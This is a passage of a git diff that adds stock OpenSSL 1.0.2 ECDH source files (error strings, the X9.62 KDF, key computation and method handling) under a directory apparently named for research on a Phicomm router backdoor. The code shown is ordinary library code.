+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write((BIO *)arg, &c, 1);
+    (void)BIO_flush((BIO *)arg);
+#  ifdef LINT
+    p = n;
+#  endif
+}
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_err.c
new file mode 100644
index 0000000..af9f625
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_err.c
@@ -0,0 +1,98 @@
+/* crypto/ecdh/ech_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ecdh.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_ECDH,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_ECDH,0,reason)
+
+static ERR_STRING_DATA ECDH_str_functs[] = {
+    {ERR_FUNC(ECDH_F_ECDH_CHECK), "ECDH_CHECK"},
+    {ERR_FUNC(ECDH_F_ECDH_COMPUTE_KEY), "ECDH_compute_key"},
+    {ERR_FUNC(ECDH_F_ECDH_DATA_NEW_METHOD), "ECDH_DATA_new_method"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA ECDH_str_reasons[] = {
+    {ERR_REASON(ECDH_R_KDF_FAILED), "KDF failed"},
+    {ERR_REASON(ECDH_R_NON_FIPS_METHOD), "non fips method"},
+    {ERR_REASON(ECDH_R_NO_PRIVATE_VALUE), "no private value"},
+    {ERR_REASON(ECDH_R_POINT_ARITHMETIC_FAILURE), "point arithmetic failure"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_ECDH_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(ECDH_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, ECDH_str_functs);
+        ERR_load_strings(0, ECDH_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_kdf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_kdf.c
new file mode 100644
index 0000000..ac722ac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_kdf.c
@@ -0,0 +1,111 @@
+/* crypto/ecdh/ec_kdf.c */
+/*
+ * Written by Stephen Henson for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#define OPENSSL_FIPSAPI
+
+#include <string.h>
+#include <openssl/ecdh.h>
+#include <openssl/evp.h>
+
+/* Key derivation function from X9.62/SECG */
+/* Way more than we will ever need */
+#define ECDH_KDF_MAX    (1 << 30)
+
+int ECDH_KDF_X9_62(unsigned char *out, size_t outlen,
+                   const unsigned char *Z, size_t Zlen,
+                   const unsigned char *sinfo, size_t sinfolen,
+                   const EVP_MD *md)
+{
+    EVP_MD_CTX mctx;
+    int rv = 0;
+    unsigned int i;
+    size_t mdlen;
+    unsigned char ctr[4];
+    if (sinfolen > ECDH_KDF_MAX || outlen > ECDH_KDF_MAX
+        || Zlen > ECDH_KDF_MAX)
+        return 0;
+    mdlen = EVP_MD_size(md);
+    EVP_MD_CTX_init(&mctx);
+    for (i = 1;; i++) {
+        unsigned char mtmp[EVP_MAX_MD_SIZE];
+        EVP_DigestInit_ex(&mctx, md, NULL);
+        ctr[3] = i & 0xFF;
+        ctr[2] = (i >> 8) & 0xFF;
+        ctr[1] = (i >> 16) & 0xFF;
+        ctr[0] = (i >> 24) & 0xFF;
+        if (!EVP_DigestUpdate(&mctx, Z, Zlen))
+            goto err;
+        if (!EVP_DigestUpdate(&mctx, ctr, sizeof(ctr)))
+            goto err;
+        if (!EVP_DigestUpdate(&mctx, sinfo, sinfolen))
+            goto err;
+        if (outlen >= mdlen) {
+            if (!EVP_DigestFinal(&mctx, out, NULL))
+                goto err;
+            outlen -= mdlen;
+            if (outlen == 0)
+                break;
+            out += mdlen;
+        } else {
+            if (!EVP_DigestFinal(&mctx, mtmp, NULL))
+                goto err;
+            memcpy(out, mtmp, outlen);
+            OPENSSL_cleanse(mtmp, mdlen);
+            break;
+        }
+    }
+    rv = 1;
+ err:
+    EVP_MD_CTX_cleanup(&mctx);
+    return rv;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_key.c
new file mode 100644
index 0000000..4f14498
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_key.c
@@ -0,0 +1,81 @@
+/* crypto/ecdh/ecdh_key.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The ECDH software is originally written by Douglas Stebila of
+ * Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ech_locl.h"
+
+int ECDH_compute_key(void *out, size_t outlen, const EC_POINT *pub_key,
+                     EC_KEY *eckey,
+                     void *(*KDF) (const void *in, size_t inlen, void *out,
+                                   size_t *outlen))
+{
+    ECDH_DATA *ecdh = ecdh_check(eckey);
+    if (ecdh == NULL)
+        return 0;
+    return ecdh->meth->compute_key(out, outlen, pub_key, eckey, KDF);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_lib.c
new file mode 100644
index 0000000..cbc21d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_lib.c
@@ -0,0 +1,265 @@
+/* crypto/ecdh/ech_lib.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The ECDH software is originally written by Douglas Stebila of
+ * Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ech_locl.h"
+#include <string.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/err.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+const char ECDH_version[] = "ECDH" OPENSSL_VERSION_PTEXT;
+
+static const ECDH_METHOD *default_ECDH_method = NULL;
+
+static void *ecdh_data_new(void);
+static void *ecdh_data_dup(void *);
+static void ecdh_data_free(void *);
+
+void ECDH_set_default_method(const ECDH_METHOD *meth)
+{
+    default_ECDH_method = meth;
+}
+
+const ECDH_METHOD *ECDH_get_default_method(void)
+{
+    if (!default_ECDH_method) {
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            return FIPS_ecdh_openssl();
+        else
+            return ECDH_OpenSSL();
+#else
+        default_ECDH_method = ECDH_OpenSSL();
+#endif
+    }
+    return default_ECDH_method;
+}
+
+int ECDH_set_method(EC_KEY *eckey, const ECDH_METHOD *meth)
+{
+    ECDH_DATA *ecdh;
+
+    ecdh = ecdh_check(eckey);
+
+    if (ecdh == NULL)
+        return 0;
+
+#if 0
+    mtmp = ecdh->meth;
+    if (mtmp->finish)
+        mtmp->finish(eckey);
+#endif
+#ifndef OPENSSL_NO_ENGINE
+    if (ecdh->engine) {
+        ENGINE_finish(ecdh->engine);
+        ecdh->engine = NULL;
+    }
+#endif
+    ecdh->meth = meth;
+#if 0
+    if (meth->init)
+        meth->init(eckey);
+#endif
+    return 1;
+}
+
+static ECDH_DATA *ECDH_DATA_new_method(ENGINE *engine)
+{
+    ECDH_DATA *ret;
+
+    ret = (ECDH_DATA *)OPENSSL_malloc(sizeof(ECDH_DATA));
+    if (ret == NULL) {
+        ECDHerr(ECDH_F_ECDH_DATA_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    ret->init = NULL;
+
+    ret->meth = ECDH_get_default_method();
+    ret->engine = engine;
+#ifndef OPENSSL_NO_ENGINE
+    if (!ret->engine)
+        ret->engine = ENGINE_get_default_ECDH();
+    if (ret->engine) {
+        ret->meth = ENGINE_get_ECDH(ret->engine);
+        if (!ret->meth) {
+            ECDHerr(ECDH_F_ECDH_DATA_NEW_METHOD, ERR_R_ENGINE_LIB);
+            ENGINE_finish(ret->engine);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+    }
+#endif
+
+    ret->flags = ret->meth->flags;
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_ECDH, ret, &ret->ex_data);
+#if 0
+    if ((ret->meth->init != NULL) && !ret->meth->init(ret)) {
+        CRYPTO_free_ex_data(CRYPTO_EX_INDEX_ECDH, ret, &ret->ex_data);
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+#endif
+    return (ret);
+}
+
+static void *ecdh_data_new(void)
+{
+    return (void *)ECDH_DATA_new_method(NULL);
+}
+
+static void *ecdh_data_dup(void *data)
+{
+    ECDH_DATA *r = (ECDH_DATA *)data;
+
+    /* XXX: dummy operation */
+    if (r == NULL)
+        return NULL;
+
+    return (void *)ecdh_data_new();
+}
+
+void ecdh_data_free(void *data)
+{
+    ECDH_DATA *r = (ECDH_DATA *)data;
+
+#ifndef OPENSSL_NO_ENGINE
+    if (r->engine)
+        ENGINE_finish(r->engine);
+#endif
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_ECDH, r, &r->ex_data);
+
+    OPENSSL_cleanse((void *)r, sizeof(ECDH_DATA));
+
+    OPENSSL_free(r);
+}
+
+ECDH_DATA *ecdh_check(EC_KEY *key)
+{
+    ECDH_DATA *ecdh_data;
+
+    void *data = EC_KEY_get_key_method_data(key, ecdh_data_dup,
+                                            ecdh_data_free, ecdh_data_free);
+    if (data == NULL) {
+        ecdh_data = (ECDH_DATA *)ecdh_data_new();
+        if (ecdh_data == NULL)
+            return NULL;
+        data = EC_KEY_insert_key_method_data(key, (void *)ecdh_data,
+                                             ecdh_data_dup, ecdh_data_free,
+                                             ecdh_data_free);
+        if (data != NULL) {
+            /*
+             * Another thread raced us to install the key_method data and
+             * won.
+             */
+            ecdh_data_free(ecdh_data);
+            ecdh_data = (ECDH_DATA *)data;
+        }
+    } else
+        ecdh_data = (ECDH_DATA *)data;
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(ecdh_data->flags & ECDH_FLAG_FIPS_METHOD)
+        && !(EC_KEY_get_flags(key) & EC_FLAG_NON_FIPS_ALLOW)) {
+        ECDHerr(ECDH_F_ECDH_CHECK, ECDH_R_NON_FIPS_METHOD);
+        return NULL;
+    }
+#endif
+
+    return ecdh_data;
+}
+
+int ECDH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                          CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_ECDH, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int ECDH_set_ex_data(EC_KEY *d, int idx, void *arg)
+{
+    ECDH_DATA *ecdh;
+    ecdh = ecdh_check(d);
+    if (ecdh == NULL)
+        return 0;
+    return (CRYPTO_set_ex_data(&ecdh->ex_data, idx, arg));
+}
+
+void *ECDH_get_ex_data(EC_KEY *d, int idx)
+{
+    ECDH_DATA *ecdh;
+    ecdh = ecdh_check(d);
+    if (ecdh == NULL)
+        return NULL;
+    return (CRYPTO_get_ex_data(&ecdh->ex_data, idx));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_locl.h
new file mode 100644
index 0000000..4e66024
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_locl.h
@@ -0,0 +1,104 @@
+/* crypto/ecdh/ech_locl.h */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_ECH_LOCL_H
+# define HEADER_ECH_LOCL_H
+
+# include <openssl/ecdh.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+struct ecdh_method {
+    const char *name;
+    int (*compute_key) (void *key, size_t outlen, const EC_POINT *pub_key,
+                        EC_KEY *ecdh, void *(*KDF) (const void *in,
+                                                    size_t inlen, void *out,
+                                                    size_t *outlen));
+# if 0
+    int (*init) (EC_KEY *eckey);
+    int (*finish) (EC_KEY *eckey);
+# endif
+    int flags;
+    char *app_data;
+};
+
+/*
+ * If this flag is set the ECDH method is FIPS compliant and can be used in
+ * FIPS mode. This is set in the validated module method. If an application
+ * sets this flag in its own methods it is its responsibility to ensure the
+ * result is compliant.
+ */
+
+# define ECDH_FLAG_FIPS_METHOD   0x1
+
+typedef struct ecdh_data_st {
+    /* EC_KEY_METH_DATA part */
+    int (*init) (EC_KEY *);
+    /* method specific part */
+    ENGINE *engine;
+    int flags;
+    const ECDH_METHOD *meth;
+    CRYPTO_EX_DATA ex_data;
+} ECDH_DATA;
+
+ECDH_DATA *ecdh_check(EC_KEY *);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif                          /* HEADER_ECH_LOCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_ossl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_ossl.c
new file mode 100644
index 0000000..df115cc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_ossl.c
@@ -0,0 +1,218 @@
+/* crypto/ecdh/ech_ossl.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The ECDH software is originally written by Douglas Stebila of
+ * Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include <limits.h>
+
